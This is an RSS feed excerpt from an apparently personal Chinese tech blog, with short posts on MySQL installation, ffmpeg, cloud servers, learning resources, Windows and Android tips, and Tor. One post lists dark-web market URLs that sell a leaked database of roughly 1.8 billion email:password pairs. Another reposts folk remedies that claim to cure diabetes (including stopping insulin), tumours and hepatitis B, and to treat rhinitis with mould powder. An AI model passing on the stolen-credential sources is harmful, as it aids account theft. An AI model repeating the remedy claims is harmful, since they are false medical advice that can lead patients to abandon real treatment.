      <description>1.描述 在mac的linux虚拟机上安装了ubuntu16 服务器版本，准备在上面装 nginx php(larvel框架)学习一下，由于 sudo apt install 命令安装的mysql数据库缺失了部分内容，在安装php的pdo扩展时候各种小问题，所以决定重新安装mysql数据库。 2.过程 刚开始下载了一个5.7.18.tar.gz的源码包，安装过程提示需要安装boost1.59版本，不只是和谐的原因还是什么情况，下载的过程太慢了，每次到百分之50左右 就提示timeout，退出了。 果断丢弃之。 重新下载了一个5.6版本的mysql，直接tar xvzf ./confgiure(路径配置为 /usr/local/mysql) .make make install 3.问题 安装完事之后，启动mysql.service start,一直提示 the server quit without updating pid file 这个错误，果断打开蓝灯，谷歌一把，在stackflow上面找打了几个回答，都没有解决我的问题，但大概知道了是由于文件权限导致的混乱，而不能启动。通过多次启动失败，观察 data目录下的.err文件(不同用户的应该不同)，观察各种错误，发现我的这个单当用户(XXX)的权限不够，刚开始冲动了一把，把网上说道的那些文件夹都 chown XXX：XXX chmod 777 了，关键问题是my.cnf 这个文件一定要写好，在[mysqld] 下面的 譬如 datadir,basedir,tmpdir,port 这几个关键的信息一定要填好路径，根据 .err文件提示的内容 可以发现这些错误。 4.总结 快睡觉了。噼里啪啦的写了一堆，记录下这个晚上两个多小时的查找问题的过程，希望以后不要犯下同样的错误，根本还是对Linux文件系统的权限分类(所有者,同组者,不同组者的具体权限不了解)，以后得多多关注，接下来准备详细写一篇文章介绍这个。</description>
    </item>
    <item>
      <title>安装you-get和ffmpeg for Mac</title>
      <link>https://anwangtanmi.github.io/posts/4e2c341d1db97260fe63d0bc659cc601/</link>
      <pubDate>Fri, 16 Jun 2017 16:16:51 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/4e2c341d1db97260fe63d0bc659cc601/</guid>
      <description> 官网下载&#xA;1.安装you-get 和 ffmpeg&#xA;# brew install you-get&#xA;# brew install ffmpeg&#xA;# brew install pkg-config&#xA;报错解决:# brew reinstall pkg-config&#xA;2.使用&#xA;# you-get ‘https://www.youtube.com/watch?v=JC82Il2cjqA’&#xA;点击查看支持下载的网站 3.ffmpeg字幕合成视频 字幕直接显示出来 # ffmpeg -i subtitle.srt subtitle.ass #把.srt格式转换为.ass # ffmpeg -i input.mp4 -vf ass=subtitle.ass output.mp4 #注意：由于ffmpeg默认是不支持libass的，所以这条命令会失败;添加–enable-libass编译选项 解决方法：在ffmpeg官网下载ffmpeg源码,重新编译: # ./configure –enable-libass –disable-yasm –disable-static –enable-shared # make -j8 # sudo make install </description>
    </item>
    <item>
      <title>如何访问在华为云服务器上部署的web项目</title>
      <link>https://anwangtanmi.github.io/posts/c12b6c4ff20771d6040dd5c3111ebc96/</link>
      <pubDate>Wed, 07 Jun 2017 19:01:47 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c12b6c4ff20771d6040dd5c3111ebc96/</guid>
      <description>华为云服务有个活动（访问网址：http://www.hwclouds.com/），通过认证后可以免费领取六个月 的云服务器使用权限，所以我也比较好奇地申请了一个，想部署自己的web项目。结果等部署完成后发现不能通过公网访问，而且也不能ping通。到最后发现是华为云服务器出入规则没有设置好的原因 解决方法:&#xA;（参考自：http://blog.csdn.net/dawn_after_dark/article/details/70237106） 登录华为云服务器官网，登录后打开管理控制台，如下图 点击服务器名称（上图红框位置），如下图所示 之后进入下图所示 点击ID（上图红框位置），进入下图所示 点击添加规则，注意这里添加两个规则 第一个规则是使公网地址可以ping通，第二个规则要注意端口范围与自己web服务器的端口相对应</description>
    </item>
    <item>
      <title>强化学习资料</title>
      <link>https://anwangtanmi.github.io/posts/263acf35f3a4780a598bdc25a4f99c63/</link>
      <pubDate>Wed, 17 May 2017 15:32:01 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/263acf35f3a4780a598bdc25a4f99c63/</guid>
      <description>学习资料重要 相关博客：http://blog.csdn.net/dark_scope/article/details/8252969&#xA;专栏：http://blog.csdn.net/column/details/deeprl.html&#xA;增强学习课程 David Silver （有视频和ppt）:http://www0.cs.ucl.ac.uk/staff/D.Silver/web/Teaching.html&#xA;最好的增强学习教材：&#xA;Reinforcement Learning: An Introduction：https://webdocs.cs.ualberta.ca/~sutton/book/the-book.html&#xA;深度学习课程 （有视频有ppt有作业）：https://www.cs.ox.ac.uk/people/nando.defreitas/machinelearning/&#xA;深度增强学习的讲座都是David Silver的：&#xA;ICLR 2015 part 1 https://www.youtube.com/watch?v=EX1CIVVkWdE&#xA;ICLR 2015 part 2 https://www.youtube.com/watch?v=zXa6UFLQCtg&#xA;UAI 2015 https://www.youtube.com/watch?v=qLaDWKd61Ig&#xA;RLDM 2015 http://videolectures.net/rldm2015_silver_reinforcement_learning/&#xA;其他课程：&#xA;增强学习&#xA;Michael Littman: https://www.udacity.com/course/reinforcement-learning–ud600&#xA;AI（包含增强学习，使用Pacman实验）&#xA;Pieter Abbeel：https://www.edx.org/course/artificial-intelligence-uc-berkeleyx-cs188-1x-0#.VKuKQmTF_og&#xA;Deep reinforcement Learning:&#xA;Pieter Abbeel http://rll.berkeley.edu/deeprlcourse/&#xA;高级机器人技术（Advanced Robotics）：&#xA;Pieter Abbeel：http://www.cs.berkeley.edu/~pabbeel/cs287-fa15/&#xA;深度学习相关课程：&#xA;用于视觉识别的卷积神经网络（Convolutional Neural Network for visual network):http://cs231n.github.io/&#xA;机器学习 Machine Learning&#xA;Andrew Ng:&#xA;https://www.coursera.org/learn/machine-learning/&#xA;http://cs229.stanford.edu/&#xA;神经网络（Neural Network for Machine Learning)(2012年的）</description>
    </item>
    <item>
      <title>关于自己看到的一些不懂技术网址的集合</title>
      <link>https://anwangtanmi.github.io/posts/effb2c4db539bfb7aadae9497fe3af6b/</link>
      <pubDate>Tue, 21 Mar 2017 10:51:19 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/effb2c4db539bfb7aadae9497fe3af6b/</guid>
      <description>HTTPS的使用&#xA;http://www.jianshu.com/p/64172ccfb73b</description>
    </item>
    <item>
      <title>暗网数据交易</title>
      <link>https://anwangtanmi.github.io/posts/c38b82429e6b851ee494c006b243bda9/</link>
      <pubDate>Sun, 19 Mar 2017 01:29:35 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c38b82429e6b851ee494c006b243bda9/</guid>
      <description>https://onion.link/ 暗网搜索入口 https://Onion.City 搜索引擎 ===》https://cse.google.com 其实是在利用google搜索 https://hansamkt2rr6nfg3.onion.link/category/74/3/ qq https://hansamkt2rr6nfg3.onion.link 数据交易地址 https://hansamkt2rr6nfg3.onion.link/listing/62557/ 126.com &amp;amp; 163.com-qq.com-tom.com-Yahoo-Sina – Sohu – eYou 1.845.606.627 COMPLETE Leak Database&#xA;数据列表&#xA;This complete Big Asian leak Contain this leak Email:Pass 1.845.606.627 NetEase-Sina - Sohu - eYou - 126.com - 163.com.etc plaintext &amp;amp; MD5 Technology 2015-10 Description Entries 163.com and 163.net 1074.795.268 qq.com 126.936.489 126.com 143.725.840 sina.com sina.com.cn 31.037.726 (yahoo.co.jp-yahoo.com yahoo.com.cn-yahoo.com.hk 23.590.165 yahoo.com.tw-yahoo.cn) sohu.com 23.198.610 hotmail.com 17.928.531 tom.com 8.</description>
    </item>
    <item>
      <title>Win7系统没有音量图标,系统图标为灰色打不开的解决方法</title>
      <link>https://anwangtanmi.github.io/posts/eaba818120283999dbfee5139cbfd90c/</link>
      <pubDate>Sat, 11 Mar 2017 21:36:02 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/eaba818120283999dbfee5139cbfd90c/</guid>
      <description>win7系统&#xA;开机后发现桌面右下角的音量图标不见了，而且也没有声音，查看声卡驱动程序又是好的，一般我们可以从“打开和关闭系统图标”中开起音量图标，不过用户在进入设置时才发现“音量”图标打开为“灰色”不可设置，那么究竟是什么问题呢？&#xA;在检查了驱动程序安装没有错误的情况下，很有可能是win7&#xA;中 Explorer.exe 没正确启动引起的我们只要将其重新启动一遍即可；&#xA;操作步骤：&#xA;1、右键点击任务栏，“启动任务管理器”；&#xA;2、切换到“进程”找到 Explorer.exe 选择后“结束”进程；&#xA;3、结束后，再点击“文件”——“新建任务（运行）”——输入“explorer.exe”回车；&#xA;4、然后确认音量图标是否出现，出现后可能有时是静音的，我们取消静音状态即可。</description>
    </item>
    <item>
      <title>安卓 魔窗SDK 快速接入</title>
      <link>https://anwangtanmi.github.io/posts/f29dabe09ba69852fade70b53963da1c/</link>
      <pubDate>Mon, 23 Jan 2017 23:15:50 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/f29dabe09ba69852fade70b53963da1c/</guid>
      <description>首先要清楚目标是什么？魔窗官网有成果视频展示，接入之前最好看一下，方向不对努力白费，不要急着对着文档操作 ， 理清思路，磨刀不误砍柴功。&#xA;公司要求的只是集成mlin功能，所以其他略去&#xA;名词解释：&#xA;1.mlink服务的配置（说白了就是指定页面的特殊url，形式上不同与超链接，但类似） 2.短链的生成是在魔窗系统后台生成的，生成的此短链用户点击后可以直接跳转至一个特定的浏览器页面，上面有一个按钮，点击后回调相关函数（此函数就是在eclipse中实现的，这个过程应该是走魔窗后台），唤醒app或是页面走到下载该app的指定位置 应该清楚 cocos、unity等集成的单 activity 官网给的文档是用安卓写的两个页面 两个activity 所以很坑 其实单个activity 的集成还简单了呢，首先要导入jar包，这步是必须的，选中工程buidpath-》cofigerBuidPath 然后选中 library这个tab addjar 引入jar (事先要拷贝到libs下，找不到就刷新项目)&#xA;配置AndroidMainTest.xml文件&#xA;添加必要权限、设置魔窗appid、添加回调url 我的粘贴到这里 有注释 （含微信sdk）&#xA;package=”com.powerfox.qp.klhnmj”&#xA;android:versionCode=”1″&#xA;android:versionName=”1.0″&#xA;android:installLocation=”auto”&amp;gt;&#xA;android:icon=”@drawable/icon”&amp;gt;&#xA;android:value=”cocos2dcpp” /&amp;gt;&#xA;android:label=”@string/app_name”&#xA;android:screenOrientation=”landscape”&#xA;android:theme=”@android:style/Theme.NoTitleBar.Fullscreen”&#xA;android:configChanges=”orientation|keyboardHidden|screenSize”&amp;gt;&#xA;android:name=”com.powerfox.qp.klhnmj.wxapi.WXEntryActivity”&#xA;android:label=”@string/app_name”&#xA;android:exported=”true”&#xA;android:launchMode=”singleTop”&#xA;android:theme=”@android:style/Theme.Translucent”&#xA;/&amp;gt;&#xA;android:configChanges=”orientation|keyboardHidden|screenSize|navigation”/&amp;gt;&#xA;android:smallScreens=”true”&#xA;android:normalScreens=”true”&#xA;android:largeScreens=”true”&#xA;android:xlargeScreens=”true”/&amp;gt;&#xA;2. 在activity类中实现一下函数即可 我的appActivity粘贴到这里（看官们有筛选的看）&#xA;/****************************************************************************&#xA;Copyright (c) 2008-2010 Ricardo Quesada&#xA;Copyright (c) 2010-2012 cocos2d-x.org&#xA;Copyright (c) 2011 Zynga Inc.&#xA;Copyright (c) 2013-2014 Chukong Technologies Inc.</description>
    </item>
    <item>
      <title>可以叫板Google的一个搜索引擎——DuckDuckGo</title>
      <link>https://anwangtanmi.github.io/posts/a3544c8e84c6e2c9056e59aaacb7c620/</link>
      <pubDate>Fri, 18 Nov 2016 21:00:18 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/a3544c8e84c6e2c9056e59aaacb7c620/</guid>
      <description>本文由Markdown语法编辑器编辑完成。&#xA;作为习惯了使用Google进行资料查询的我来说，如果没有Google，真的感觉很难受。纵使找了一些可以翻墙的软件，但无奈还是经常不稳定，总是时断时续的。Bing和百度搜索出来的东西，距离自己想要的东西，差别比较大。&#xA;前段时间在虎嗅上面读到一篇关于搜索引擎的文章，题目叫：《谷歌是最安全的搜索引擎？这家谷歌的竞争对手有话要说》。原文链接：https://www.huxiu.com/article/148190/1.html。&#xA;文章首先承认谷歌Google是当今世界搜索引擎的巨无霸，即使微软花了很大的力气研发了Bing搜索，但是在搜索精准度上还是与Google相差甚远。&#xA;但是，这两年在搜索引擎领域中却冒出了一匹黑鸭，叫DuckDuckGo (鸭子鸭子跑)，它已经成为了Google在搜索领域最小却也是最主要的竞争对手之一。2015年，DuckDuckGo被用户进行了多达30亿次的搜索，虽然这仅仅相当于Google的日搜索量，但是这家公司2011年才仅有3名员工。&#xA;DuckDuckGo之所以能在强手如林的搜索引擎市场下，赢得一席之地，必然是有它的独到之处。那就是找准了自己的定位——让用户做私人的、匿名的网络搜索。因为很多用户非常反感Google对他们的搜索信息进行收集和分析。这就是差异化竞争。&#xA;搜索引擎公司的一大收入来源是广告收入。针对什么样的用户，投放什么样的广告，被用户点击的机率更大，这是搜索引擎公司一个很重要的工作，不管是Google，还是百度等其他搜索引擎。那么，这些公司在广告投放前，便会根据该用户之前搜索过的信息，来判断该用户的兴趣喜好等。也就是说，我们的每一次检索内容都会被搜索引擎“悄悄地”记录下来，然后对这些记录进行分析，然后再投放具有针对性的广告，增加广告的被点击率，从而为搜索引擎公司带来巨额收入。&#xA;DuckDuckGo不会收集用户信息来为广告商提供精准营销，相反地，它加入了微软/Bing/雅虎的广告网络，并且基于一些更普遍的事实推送没有针对性的广告，比如根据你使用英文搜索这一事实推送英文广告。而谷歌可以根据你刚刚搜索“夏天 裙子”，就在你接下来登陆的所有网站推送女装网店广告，这偶尔会让小探觉得毛骨悚然。&#xA;好了，大家可以试用一下这个搜索引擎，虽然它可能不像Google那样精准，但是在查找国外的技术资料时，还是要比百度强很多倍的。而且，这个搜索引擎不会收集你的个人信息，而且它目前还没有被政府屏蔽。&#xA;以下是这个搜索引擎的访问地址和主页界面： https://duckduckgo.com/ 要想成功，就要敢于创新，就要搞差异化竞争。这家公司做到了，为他点赞！！！</description>
    </item>
    <item>
      <title>太阳能电池暗时特性</title>
      <link>https://anwangtanmi.github.io/posts/18bf96846f1ff4109efc1815a741ca53/</link>
      <pubDate>Sat, 12 Nov 2016 12:35:57 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/18bf96846f1ff4109efc1815a741ca53/</guid>
      <description>昨天在画电路图，需要判断太阳能电池有无，当有光照时候比较容易判断，因为有光照太阳能电池有电压，但是当无光照或者暗时，太阳能电池无电压，此时就不好判断太阳能电池有无。所以上网搜索资料后，总结出了一个判断的方法。&#xA;如下图一，太阳能电池等效电路图。&#xA;实际上太阳能电池可以理解为恒流源和二极管并联，同时还有串联电阻和并联电阻的存在。当无光照时，对太阳能电池加电压，太阳能电池会表现出如下图的二极管特性。&#xA;当有电流时，太阳能电池也会有电压出现，并且当电压达到太阳能电池的VF时，电流继续增大电压基本不变。可以利用这个特性，当无光照时，对太阳能电池加电压，同时保证有电流存在（串入限流电阻），可以判断此时太阳能电池两端电压情况，根据此时的电压情况可以判别出有无太阳能电池存在。</description>
    </item>
    <item>
      <title>Eclipse 更换黑色主题</title>
      <link>https://anwangtanmi.github.io/posts/34c8678302b3e12d91180bcda52774e4/</link>
      <pubDate>Tue, 21 Jun 2016 13:39:01 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/34c8678302b3e12d91180bcda52774e4/</guid>
      <description>版本：&#xA;Eclipse Java EE IDE for Web Developers.&#xA;Version: Mars.2 Release (4.5.2)&#xA;Build id: 20160218-0600&#xA;Window&amp;gt;Reference&amp;gt;General&amp;gt;Apperence&amp;gt;&#xA;设置过后：</description>
    </item>
    <item>
      <title>民间祖传秘方 (转载)</title>
      <link>https://anwangtanmi.github.io/posts/c3659e19ce270f569e1b31ad5b9379c3/</link>
      <pubDate>Mon, 21 Mar 2016 11:03:15 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/c3659e19ce270f569e1b31ad5b9379c3/</guid>
      <description>深圳市 陈东飚 编辑 http://www.360doc.com/content/12/0815/11/7786271_230278713.shtml&#xA;编者按: 我收集的这些药方多数是有人用过，确有特效的，可供参考。但我还没有全部用过，如想试用请咨询专业医生，然后再使用。&#xA;治愈糖尿病奇效方 1 黄精，生地各15，玉竹、天冬、麦冬、菊花、山药 各10，黄连3，五味子5（克），每日一剂，水煎服二次，治一个月，治 愈者无数。 《中国民间名医成方》&#xA;2 元参、麦冬、熟地、黄芩各90，豆鼓45，知母、山 茱萸各30，云苓、栀子、天花粉各15（克），（加减略），每日一剂，水煎三次，药液合一起，分三次服 ，服10天治愈不复发。 《民间实效验方宝典》&#xA;3 粉葛、天花粉各10，麦冬5，江米10（克），研细&#xA;混匀 ，每日一剂，分三次服，服半个月治愈糖尿病。&#xA;《中老年自我治病奇效方集锦》&#xA;4 熟地40，山药20、山茱萸、丹皮、云苓、泽泻、怀牛膝&#xA;各15，附子、肉桂各10，车前子5（克），五味子10粒，每日一剂，水煎三次，药液合一起，分三次服，服第四剂时，开始每剂加麦冬15克，服7–10剂治愈，已治愈几百人。&#xA;《祖传秘方》&#xA;5 人参10，知母30、甘草15，加减：口渴加天花粉20，&#xA;麦冬15，沙参20，玉竹20,；腰酸腿痛加山药20，枸杞子15（单位：克）每日一剂，水煎服，服6剂，三多症状消失，服一个月，血糖、尿糖正常，治愈者无数，反复者罕见。《糖尿病良方1500首》&#xA;6 生地、杜仲、山茱萸各15，黄芪、黄柏、知母、夏枯草、茜草根、牛膝各10，海藻、茯苓各12，山药24，牡蛎30（克），每日一 剂，水煎服二次，14天为一疗程，共服两个疗程，治115例，全部治愈，疗效奇特，随访无反复。《中国民间名医成方》&#xA;7 白茅根、地骨皮、生地、山药各30，马齿苋50，黄芪、&#xA;知母各20、酒黄连10，淫羊藿、麦冬各15（克），每日一剂，水煎服三次， 服20–30天治愈，很少复发。《中国民间秘方验证大全》&#xA;8 淫羊藿20克，枸杞子15克，每日一剂代茶饮或水煎服，同时每次服黄连素0.4（4片），每日服三次，服3–4个月，治愈糖尿病。 《神效奇方》&#xA;糖尿病奇方&#xA;黄豆二斤 鲜姜一斤切成片 香醋四斤将黄豆洗干净放入大口瓶子里，一层黄豆一层鲜姜片，放好后倒入香醋，密封好泡四个月后，每日晚饭后吃10–12粒黄豆，2–3片鲜姜，食用一周后你在去查血醣，你就会发现有变化了，食用三月后血糖就将恢服到正常值了&#xA;糖尿病剋星 –六角豆&#xA;六角豆（Bhindi）的另一名稱為“秋葵”上個月,在 一個電視節目中我獲悉一種糖尿病的治療方法。由於我是個糖尿病患者，我嘗試了而它非常有效，我的血糖現在已得到了控制。實際上我已經減少了我的藥量。拿兩 條六角豆並切除頭尾兩端部分，再沿長身中間界一小刀，然後將這兩條六角豆放入一杯清水﹝室温﹞中，蓋好並在室溫下放置過夜。清晨，在早餐前從水中取出丟掉 兩條六角豆並飲用此水。每日堅持如此。在兩個星期內，你將看到血糖降低的驚人效果。我的妹妹已擺脫了她的糖尿病。她已注射了多年胰島素，但當每天早上服用六角豆並持續數月後，她已停用了胰島素而每天堅持服用六角豆。她每晚將六角豆切碎，加入水中並在第二天早晨將它喝光。嘗試一下，即使並沒有對你起多大作用也不會帶來任何傷害，但由於多數案例是慢性作用的，在看到效果之前你需要堅持服用數月。&#xA;乳房肿块、子宫肌瘤、卵巢囊肿保密配方&#xA;2008年底，中国中医研究院，云南彝族医药研究所联合专利保护部门，在北京首度公开了珍藏在中医馆的彝药古方、九十三岁的彝医大师曲苓章的祖传秘方：取三七75克，香附75克，鼠妇虫30克、碎成细未混匀备用。选五香血藤600克、鸡矢藤600克、金荞麦600克、加水煎熬三次合并熬成稠膏，最后加入上述细粉，混合均匀即可服用。（泰康消结片是同一方药组成）。此方已传270余年现已入国家药典，众多临床表明，服用六天左右乳房肿块下腹坠胀感可明显减轻，一个来月肿块、肌瘤、囊肿会大面积萎缩，二三个疗程，大的肿块肌瘤囊肿都能消失。月经不调，痛经、白带异常也会恢复正常&#xA;一味中药敷、乳房肿块消 威灵仙适量打成粉末，然后装在一个小布袋里面，晚上睡觉的时候放在乳罩里面贴着乳房的包块，敷一段时间后包块就散了，已经有接近十年没有再长包块，而且来月经时乳房也不会胀痛了，真的很神奇，&#xA;*一个医生无私献出医院治疗乙肝大小三阳的良效验方：&#xA;灵芝20克.虎杖10克.生甘草5克.每天一剂，水煎分早晚二次服.并服西药：转移因子胶囊.维生素C片.按说明书服用。因厂家不同，剂量也不同，但不管什么厂家生产的都行，成份肯定都一样的。患者可以自已买药治疗，坚持服用3至6个月。提高免疫及抗病毒效果极佳。为了让中国1.3亿乙肝病人摆脱病魔捆扰，请广而告之！&#xA;揭穿乙肝不能转阴的谎言&#xA;现在有些医学专家把乙肝病给妖魔化了,往往会告诉患者：“乙肝会终生携带，要使乙肝表面抗原[HbsAg]转阴是不可能。”我认为这些医学专家的说法完全是不负责任的，不但给患者带来了极大的精神负担，而且也是完全错误的，据科研证明约百分之八十至百分之八十五的急慢性病毒性乙肝是能够完全治愈的，而只有百分之十至百分之十五的病人演变为轻度慢性乙肝或中.重度慢性乙肝，且经正规系统.专业治疗后.病变的肝脏组织仍可完全恢复正常而痊愈，说乙肝治不好,造成乙肝患者压力很大,没有信心治疗的现象,这样很不好的.不管什么病,不治疗就会从小病变大病的,患了病就必须治疗的.有些医生说,肝功正常就无需治疗,等肝功不正常了再治疗,这完全是延误病情的言论.。好多人听信了,等到肝硬化了，肝功不正常了，再治疗就不好治了。其实乙肝早就能治愈了。中国卫生部属下的人民卫生出版社,1990年12月第一版,2004年4月第3版第6次印刷出版的〈中成药实用手册&amp;gt;第三页’乙肝宁冲剂，第五页’乙肝清热解毒冲剂，笫四百三十六页’肝达片；中国中医药出版社2001年8月第一次印刷出版的〈现代中成药手册〉第143页；及江西科学技术出版社1997年11月第二次印刷出版的〈现代中成药〉第201页上都有记载.百分之41.6能转阴；还有安徽科学出版社2003年7月第5次印刷出版的〈实用临床医学全书〉第607页上也有记载；用西药也可以使百分之30-45的乙肝转阴.这是早几年的书，我们医院据病情另外加的还有其它药，现在转阴率比这更高了。希望患者不要因不好治就不积极治疗了，不管什么病不治疗是不易自愈或减轻的，接受了治疗最起码能使病情得到控制及减轻，而且还有治愈的可能，现在科学在不断发展，以前不能治愈的病，不等于现在不能治愈。我认为，肝病并不可怕。我国运用中医疗法在治疗天花、水痘、乙脑、流行性出血热、结核病、非典等传染性疾病，都取得了可喜的成就，在肝病的治疗上，也一定能取得最大的胜利。那些医生认为乙肝病毒是不可清除的说法，是极其愚蠢的。是不对的。因为他没有办法使乙肝转阴，才这样说。有些病人，没有经治疗，自己就抗原转阴了，一开始化验，就是第二项阳性了，有第五项阳性了，有2、5阳性了，还有2、4、5阳性了，人家没有治疗就好了，凭什么就说：“现在肝炎病毒转阴是完全不可能的”？在临床工作中，常见一些人来体检，看有没有肝病。结果化验一出来，有人是第二项阳性，有人是2、4项阳性，有人是2、4、5阳性。从这些情况中充分说明，有些乙肝患者可以自然转阴的。当然，这是少数的，乙肝患者可不能等着靠自然转阴,应积极治疗。这只是说明乙肝是完全可以转阴痊愈的。 有一次，有一48岁男士，他本人是第五项阳性，领16岁的儿子看病，儿子是大三阳，治了两年了，还是大三阳，来到我们医院。就问道：这大三阳到底能好吗？我说“能好！你本人并没有进行任何治疗，不是就成了第5项阳性？它其实是由第一项阳性转来的，只是你第一项阳性时，你并没有去化验，你不知道。这是由于你自己有正常的免疫能力，不知不觉中把病毒已经清除了，产生了抗体，“这说明了什么？说明乙肝是可以好的。并且，是没有治疗就已经自愈了”，所以我说乙肝能治愈是有一定根据的. 以前，一个人一旦得了乙肝，就要被压上“三座大山”“一.快速变坏的健康状况。恶心.呕吐.消瘦.黄疸.肝痛，甚至沿着“乙肝一一肝硬化一一肝癌”的方向发展。二.强大的心理压力。乙肝通过血液.性生活.母婴.唾液传播等多种渠道传播，有乙肝就会被周围的人疏远，歧视。恋人分手，朋友疏远，同学同事排斥，恋爱.婚姻.事业都化为泡影！三.沉重的经济负担。治乙肝常用干扰素和拉米夫定，高昂的医药费，每个月至少一千块。三座大山”让肝病患者生不如死。慢性乙肝患者终究有人发展为肝硬化、肝癌等。这种现象使许多患者忧心忡忡，情绪低落。其实，慢性乙肝罹患肝癌只是少数。对于发展为肝癌的可能性要有正确的认识。既要看到乙肝与肝癌的相关性，又要看到这种比例不是很高的现实。肝炎的发展很大程度上取决于个人的免疫状态，而免疫状态又与个人情绪密切相关。心理负担过重只会影响预后，对病情毫无益处。所以，对于乙肝患者来说，乐观地面对现实、积极地配合医生治疗才是明智的做法。 据中国疾病预防控制中心最新报告显示：中国有近1.3亿的慢性乙肝感染者，每一位患者都是想乙肝表面抗原[HbsAg]转阴，彻底治愈乙肝，从乙肝的阴雳中解放出来。但现实是，很多医生告诉患者：“乙肝会终生携带，要使乙肝表面抗原[HbsAg]转阴是不可能。”这些医生的说法是不负责任的，不但给患者带来了极大的精神负担，而且是完全错误的，据科研证明约百分之八十至百分之八十五的急慢性病毒性乙肝是能够完全治愈的，而只有百分之十至百分之十五的病人演变为轻度慢性乙肝或中重度慢性乙肝，且经正规系统.专业治疗后.病变的肝脏组织仍可完全恢复正常而痊愈，只有极少数演变为轻度慢性乙肝或中.重度慢性乙肝。 采用中西医结合的独特疗法治疗乙肝大小三阳,一般服药3-6个月就能使乙肝大小三阳转阴,为了让中国1.3亿乙肝病人摆脱病魔的捆扰！我决定无尝献出治疗乙肝大小三阳的验方：中药是灵芝20克.虎杖10克.生甘草5克.每天一剂，水煎分早晚二次服.并服西药：转移因子胶囊.维生素C片.按说明书服用。因厂家不同，剂量也不同，但不管什么厂家生产的都行，成份肯定都一样的。患者可以自已买药治疗，坚持服用3至6个月。提高免疫及抗病毒。不要认价格便宜就不好。 灵芝对多种理化及生物因素引起的肝损伤有保护作用。无论在肝脏损害发生前还是发生后，服用灵芝都可保护肝脏，减轻肝损伤。灵芝能促进肝脏对药物、毒物的代谢，对于中毒性肝炎有确切的疗效。尤其是慢性肝炎，灵芝可明显消除头晕、乏力、恶心、肝区不适等症状，并可有效地改善肝功能，使各项指标趋于正常。所以，灵芝可用于治疗慢性中毒、各类慢性肝炎、肝硬化、肝功能障碍。灵芝所含的多糖、多肽等可促进其免疫功能的完善，增强抗病能力。 虎杖含有的一种黄酮类物质对金黄色葡萄球菌、白色葡萄球菌、变形杆菌有抑制作用。10%虎杖煎液对单纯疱疹病毒、流感亚洲甲型京科68-1病毒及埃可Ⅱ型病毒(ECHO11)均有抑制作用。3%煎液对479号腺病毒3型、72号脊髓灰质炎Ⅱ型、44号埃可9型、柯萨奇A9型及B5型、乙型脑炎(京卫研I株)、140号单纯疱疹等7种代表性病毒株均有较强的抑制作用。虎杖单体Ⅰ和Ⅱ可使乙型肝炎抗原滴度降低8倍。 甘草酸类主要表现为增强巨噬细胞吞噬功能和增强细胞免疫功能的作用。甘草甜素对人体免疫性缺陷病毒（艾滋病病毒，HIV）、肝炎病毒、水疱性口腔病毒、腺病毒Ⅲ型、单纯疱疹病毒Ⅰ型、牛痘病毒等均有明显的抑制作用。转移因子胶囊主要成份为以健康猪或牛脾脏中提取的多肽、氨基酸和多核苷酸等。可增强或抑制体液免疫细胞和细胞免疫功能。维生素C片用于治疗肝硬化、急性肝炎和砷、汞、铅、苯等慢性中毒时肝脏的损害。以上是药物作用说明，大家可以从书上或网上查，请乙肝患者放心,自已去药房买药服用。这也是我院验方，我揭穿乙肝不能转阴治愈的谎言和无尝献出治疗乙肝大小三阳的验方.我预料那些没本事治愈乙肝的专家和利益集团会报复我的，但我不怕，我相信大家会支持我的。另外，也许这些没本事治愈乙肝的专家和利益集团会质疑我，说我的不是,请大家分辨是非。相信我。我献出治疗乙肝大小三阳的验方是无尝的.不谋任何利益，只是想为了让中国1.3亿乙肝病人摆脱病魔的捆扰！&#xA;蒲公英对乙肝有治愈效果&#xA;我今年68岁，1985年12月离休。离休前，身体素质欠佳，曾四次住院治病。离休后，我非常器重健身，为了探索健身新道路，从1993年起，吃起了蒲公英。近两三年来，每到春暖花开的时候，我都要去郊外挖蒲公英。既是春游，又是拔菜。回家后淘洗干净，控干，切碎装罐，少加点盐，多添点醋。一罐菜能吃三、五天。吃完了，又接着出去采。如斯一直地采，不间断地吃，可以吃到霜降止。我之所以连续．三年来不断吃蒲公英，仅仅是为了清热泻火。但服用的实际成果表明，它不仅能清热泻火，更主要的是可能解毒。1982年我左眼上眼帘上，出了个形似玉米粒大的黑瘤，常常痛苦悲伤。为此，我多次去大医院求诊，但都收效甚微。无奈，我只好顺其天然，任其发展，1993年吃蒲公英半年后，眼上的黑瘤竟奇观般地不见了，我让老伴看，老伴左摸右按，笑着说：“奇异，真奇怪，黑瘤就是不见了”。更令人愉快的是，我的乙肝病基础痊愈了。1992年11月22日进行五项指标化验时，HBC呈阳性，阐明病毒正在发展，经过—年多吃蒲公英，到1994年3月9日五项指标化验时，HBC变为阴性。由此可见，蒲公英对乙肝也有治疗作用。自从尝到吃蒲公英的甜头后，我对蒲公英意识更明白了，不但吃叶，而且也吃根；不但当菜吃，而且还熬水喝。荐方人：河南新安县干休所楚雪&#xA;鼻炎的民间偏方&#xA;1、食醋1斤、大蒜去皮半斤、苍耳子30克，白芷50克，一起浸至半月后。每天早晚拿出来闻10-30分钟，闻之前先嗅吸开水瓶里5-10分钟以上的热蒸汽，坚持闻2-3个月，慢性鼻炎可彻底断根。&#xA;2.用砖和瓦上的青醭(绿色的霉)，焙干研碎成粉撒入鼻孔，每天三次，三日除根</description>
    </item>
    <item>
      <title>真正的匿名上网——Tor浏览器</title>
      <link>https://anwangtanmi.github.io/posts/40a151e4851d15058e94bb72ec65b85c/</link>
      <pubDate>Sun, 20 Mar 2016 13:45:05 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/40a151e4851d15058e94bb72ec65b85c/</guid>
